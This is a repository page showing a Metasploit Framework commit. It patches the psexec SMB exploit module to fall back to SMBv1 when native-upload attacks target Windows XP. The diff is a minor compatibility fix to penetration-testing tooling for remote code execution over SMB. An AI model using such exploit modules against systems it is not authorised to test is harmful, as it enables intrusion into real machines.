infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #10242, avoid using SMBv2 on Windows XP Native Upload targets

4.x
Jacob Robles 2018-07-02 17:34:53 -05:00 committed by Metasploit
parent c5dce5edd7
commit 7f3dfccbfe
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
1 changed files with 14 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
modules/exploits/windows/smb/psexec.rb
View File

@ -86,12 +86,22 @@ class MetasploitModule < Msf::Exploit::Remote
]) ])
end end
def native_upload_with_workaround
# Avoid implementing NTLMSSP on Windows XP
# http://seclists.org/metasploit/2009/q1/6
if smb_peer_os == "Windows 5.1"
connect(versions: [1])
smb_login
end
native_upload(datastore['SHARE'])
end
def exploit def exploit
print_status("Connecting to the server...") print_status("Connecting to the server...")
connect(versions: [1,2]) connect(versions: [2,1])
print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...") print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")
smb_login() smb_login
if not simple.client.auth_user and not datastore['ALLOW_GUEST'] if not simple.client.auth_user and not datastore['ALLOW_GUEST']
print_line(" ") print_line(" ")
@ -117,12 +127,12 @@ class MetasploitModule < Msf::Exploit::Remote
execute_powershell_payload execute_powershell_payload
else else
print_status('Selecting native target') print_status('Selecting native target')
native_upload(datastore['SHARE']) native_upload_with_workaround
end end
when 'PowerShell' when 'PowerShell'
execute_powershell_payload execute_powershell_payload
when 'Native upload' when 'Native upload'
native_upload(datastore['SHARE']) native_upload_with_workaround
when 'MOF upload' when 'MOF upload'
mof_upload(datastore['SHARE']) mof_upload(datastore['SHARE'])
end end